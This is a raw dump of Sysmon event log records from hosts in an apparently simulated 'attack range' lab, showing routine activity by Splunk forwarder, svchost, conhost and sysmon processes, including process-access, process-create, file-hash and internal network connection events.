AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C24CFBDC015752731558E05B5182BBE,SHA256=5D9469BB2465B4ADEB833F0D13AAFBF92C64D5F2221EF212144ECCB2F879AE95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:44.543{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CF281ABA26798D58ED642B695136CB2,SHA256=1DBFB8738707E43290CA4ACD78E8099EA84E636B55AAD3E2029A7393020B4A90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1418-6216-A604-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1418-6216-A604-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.699{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1418-6216-A604-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.700{4F8D34B0-1418-6216-A604-000000003902}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:44.605{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B62C8DA7092DD0423EC9838F75104287,SHA256=F94F9C522820920259E1DCE215B66100008B5650E7774B94FA4C3A53052FAAA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:42.634{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53878-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:45.561{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B780144486A84F4F3C0A7393F1CDE8A1,SHA256=265EE4A31D32CE931C11ACD78AE1893C0720631D548D33AD7D19D2029469BFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.840{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C3C0F8AA3CCCE9104A7AF07A3C69B06,SHA256=F0A40C6D638FF245560620966538977D002D75D4EA0C1886BA1247A82FBFAF3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.840{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=401C519A41D7F179D66BEC32FDCD143E,SHA256=749C3FB5678EF2BFE50AEFB686FDB7C773BFE8C897EEDA221C662379B89D444C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.840{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0BA8FD632044EE635968776BB4871FD,SHA256=804DAF638A35616D3375DB926E212C0F3D01BC1BF3B497036D795EFF084CC47F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1419-6216-A704-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:45.215{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 